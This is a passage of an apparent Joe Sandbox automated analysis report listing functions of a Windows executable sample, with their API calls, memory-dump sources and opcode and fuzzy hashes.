                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: f8f0656341598af6003fffa7e335d44fb7c45440e0a5f27bfaa7809f138a3a24
                                                                                          • Instruction ID: f8e5d12a5396f01bf620be82444f100fbb73542f64ff430a6b4de12a763c06bc
                                                                                          • Opcode Fuzzy Hash: f8f0656341598af6003fffa7e335d44fb7c45440e0a5f27bfaa7809f138a3a24
                                                                                          • Instruction Fuzzy Hash: 2BD197F2B0C68256FB688B2595443B977A1FF2AB84F044035CB5D877A5CF38E465A702
                                                                                          Function 00007FF6373A5294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1017591355-0
                                                                                          • Opcode ID: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                                                                          • Instruction ID: 0294a09c1e44f36d119eaaffd41327906cca50c3b6953381aa330c6ce509f0a1
                                                                                          • Opcode Fuzzy Hash: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                                                                          • Instruction Fuzzy Hash: E3612352E0C65781FEE49B2588162BE63B1AF81BD1F244135EE4EC7BC6EE7DE440B200
                                                                                          Function 00007FF6373B1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373AE948: ReleaseSemaphore.KERNEL32 ref: 00007FF6373AE974
                                                                                            • Part of subcall function 00007FF6373AE948: CloseHandle.KERNELBASE ref: 00007FF6373AE993
                                                                                            • Part of subcall function 00007FF6373AE948: DeleteCriticalSection.KERNEL32 ref: 00007FF6373AE9AA
                                                                                            • Part of subcall function 00007FF6373AE948: CloseHandle.KERNEL32 ref: 00007FF6373AE9B7
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6373B1ACB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 904680172-0
                                                                                          • Opcode ID: bf490f98653311f0fa717d6a61b3b21447a9b3ceefdab9f981681a0b66a97f5a
                                                                                          • Instruction ID: 6f41e1ab3e95e3b9cdeb1571b6b24d4b114092908b7365ad2cf3e968e9d67ae9
                                                                                          • Opcode Fuzzy Hash: bf490f98653311f0fa717d6a61b3b21447a9b3ceefdab9f981681a0b66a97f5a
                                                                                          • Instruction Fuzzy Hash: C9617E62B1DA9AA2FE08DB65D5540BC7365FF40B90B544236E72E87BD5CF38F4A19300
                                                                                          Function 00007FF63739EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: 607368e413bc42d48fc483c0537fc0e05792b1f83dee924582f930783f75b2fb
                                                                                          • Instruction ID: 0ed1f5c9b33e362906e0c5d3d4ca0e2ec66d1a582bafc60e49770d14eb70f9ab
                                                                                          • Opcode Fuzzy Hash: 607368e413bc42d48fc483c0537fc0e05792b1f83dee924582f930783f75b2fb
                                                                                          • Instruction Fuzzy Hash: 1C51E163E4D68690FE109B25E4457B92791FB96BC4F480136EE8D87396CF3DE485D300
                                                                                          Function 00007FF63739E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373A3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6373B0811), ref: 00007FF6373A3EFD
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF63739E993
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1011579015-0
                                                                                          • Opcode ID: b25a0dcdf97d563b9153ddc70198164d8453106f1b1cd9031932cf08272d4a92
                                                                                          • Instruction ID: 7b797d560da4e53dfce14c5ad3f3cdc0e28262d3971571c891dd162d86a1bdaf
                                                                                          • Opcode Fuzzy Hash: b25a0dcdf97d563b9153ddc70198164d8453106f1b1cd9031932cf08272d4a92
                                                                                          • Instruction Fuzzy Hash: 9B518D23A0D68681FB609F68D4857AD63A1FF96F84F440136EA8D877A5DF3CE441E710
                                                                                          Function 00007FF6373A1794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: 26cde9ff6a100412955907b86b9e0c80228dcd9fdbec816ea4acd55efa22fafd
                                                                                          • Instruction ID: 10c7520577cb09877dad051c5247f8a4951e49924398db52b44d5b55b955ef8f
                                                                                          • Opcode Fuzzy Hash: 26cde9ff6a100412955907b86b9e0c80228dcd9fdbec816ea4acd55efa22fafd
                                                                                          • Instruction Fuzzy Hash: 0941F562B1CB9542FE549B17AA4137AA265FB84FC0F448435EE5C87F5ADF3CD4919300
                                                                                          Function 00007FF6373A2F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: 8cd98ff17c05f97013a75cff5eaae389366bfe60105b722eb513396895086490
                                                                                          • Instruction ID: bbc182d08c38416d81cba8daa1356d83a9c47cce7328678862feb43a6357cf59
                                                                                          • Opcode Fuzzy Hash: 8cd98ff17c05f97013a75cff5eaae389366bfe60105b722eb513396895086490
                                                                                          • Instruction Fuzzy Hash: 72410362A0CB0681FF90DB29E54637923A1EB89BD8F141134EE5E877A9DF3DE440D741
                                                                                          Function 00007FF6373CBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                          • String ID:
                                                                                          • API String ID: 3947729631-0
                                                                                          • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                          • Instruction ID: bcfc669ac84739a0ebeeebbb44a9f2782d01ccba6a79048b891b99f0b6f9bb04
                                                                                          • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                          • Instruction Fuzzy Hash: 5241A322E1D66782FB28DB25A8501B823A1EF54B82F444436DA0DC77A5DF3DF841FB40
                                                                                          Function 00007FF63739129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                          • String ID:
                                                                                          • API String ID: 680105476-0
                                                                                          • Opcode ID: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
                                                                                          • Instruction ID: 46c62ea4dc92a21ad8bc688e65c5afe6cdd53be023b575d27f249336571e5d5a
                                                                                          • Opcode Fuzzy Hash: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
                                                                                          • Instruction Fuzzy Hash: 2921C122A0C75285FA149F92A4803B96260FB16BF0F680B30DF7E97BD5DE7DE451A301
                                                                                          Function 00007FF6373BFC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373BF0A4: GetDlgItem.USER32 ref: 00007FF6373BF0E3
                                                                                            • Part of subcall function 00007FF6373BF0A4: ShowWindow.USER32 ref: 00007FF6373BF109
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF11E
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF136
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF157
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF173
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF1B6
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF1D4
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF1E8
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF212
                                                                                            • Part of subcall function 00007FF6373BF0A4: SendMessageW.USER32 ref: 00007FF6373BF22A
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6373BFD03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1587882848-0
                                                                                          • Opcode ID: c20030a3afda42706f7104e8e1bde8bfc74bee88a3efc3b3243f0cf61f98a651
                                                                                          • Instruction ID: 4d92a26086088f107abd5686e348fa1e0e74358f33a8e05702065b1030159641
                                                                                          • Opcode Fuzzy Hash: c20030a3afda42706f7104e8e1bde8bfc74bee88a3efc3b3243f0cf61f98a651
                                                                                          • Instruction Fuzzy Hash: 8F01DBA2E1C68A82FD109774D44537D6311EFC9794F501335EAAC86BDADE3CF0809604
                                                                                          Function 00007FF637393AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                                                                          • Instruction ID: 9fe862a2224983a29ddae6428d0a1905cc5c015be8de1ee27db4e328c2011ddf
                                                                                          • Opcode Fuzzy Hash: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                                                                          • Instruction Fuzzy Hash: 1C0192A2E1CB8681FA119728E44536D7361FFDA7A4F805331EAAC47BA5DF3DE0409705
                                                                                          Function 00007FF6373C1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373C1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6373C1573,?,?,?,00007FF6373C192A), ref: 00007FF6373C162B
                                                                                          • DloadProtectSection.DELAYIMP ref: 00007FF6373C15C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DloadHandleModuleProtectSection
                                                                                          • String ID:
                                                                                          • API String ID: 2883838935-0
                                                                                          • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                          • Instruction ID: fea2e3ae7897ab427e3c8fc47aeb0975db5ae97f64d45909353e1bf30a74b090
                                                                                          • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                          • Instruction Fuzzy Hash: 80119EE0E0C51782FF689B1AA8557F02391EF14389F140435DA0DC63A1EF3CA5A9F604
                                                                                          Function 00007FF6373A3EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373A40BC: FindFirstFileW.KERNELBASE ref: 00007FF6373A410B
                                                                                            • Part of subcall function 00007FF6373A40BC: FindFirstFileW.KERNELBASE ref: 00007FF6373A415E
                                                                                            • Part of subcall function 00007FF6373A40BC: GetLastError.KERNEL32 ref: 00007FF6373A41AF
                                                                                          • FindClose.KERNELBASE(?,?,00000000,00007FF6373B0811), ref: 00007FF6373A3EFD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1464966427-0
                                                                                          • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                          • Instruction ID: 5a43fbfbd79516cff3c0ea94246292cb42341902a624aa2b70c691b177a79b84
                                                                                          • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                          • Instruction Fuzzy Hash: 9FF0C26290C28285FE949FB5A1062B937609F1ABB8F145338EE3D473C7CE38D484E746
                                                                                          Function 00007FF6373A2490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileType
                                                                                          • String ID:
                                                                                          • API String ID: 3081899298-0
                                                                                          • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                          • Instruction ID: 6d4210ccb7fabeb9c40625e6834c639d8d2c9f60b0e9bf510b5a9c4aa4a332fe
                                                                                          • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                          • Instruction Fuzzy Hash: 09D0C91290D45192ED509736985207C2350AF92735FA40720D63EC17E1CE2DA4A6B215
                                                                                          Function 00007FF6373A7FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID:
                                                                                          • API String ID: 1611563598-0
                                                                                          • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                          • Instruction ID: 3b3d0ac29645c5363e46b97bbb86342da741c5c8ac2313875eeb948b5f21eaf3
                                                                                          • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                          • Instruction Fuzzy Hash: 02C04C21F1A503C1EE485B26C8CA15813A5FB54B09F654139D50DC1270DE3DD5EAB74A
                                                                                          Function 00007FF6373A20D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
